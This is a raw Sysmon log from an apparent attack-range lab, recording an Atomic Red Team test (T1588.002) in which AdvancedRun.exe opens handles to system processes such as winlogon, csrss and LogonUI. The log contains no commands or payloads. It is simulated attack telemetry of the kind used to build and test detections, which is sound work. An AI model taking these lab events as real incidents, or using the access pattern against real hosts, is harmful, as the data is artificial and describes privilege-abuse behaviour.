17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983159Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983158Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983157Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983156Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983155Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983151Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 734700x80000000000000003983150Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}4584C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983149Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983148Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983146Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983145Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983144Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983143Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYS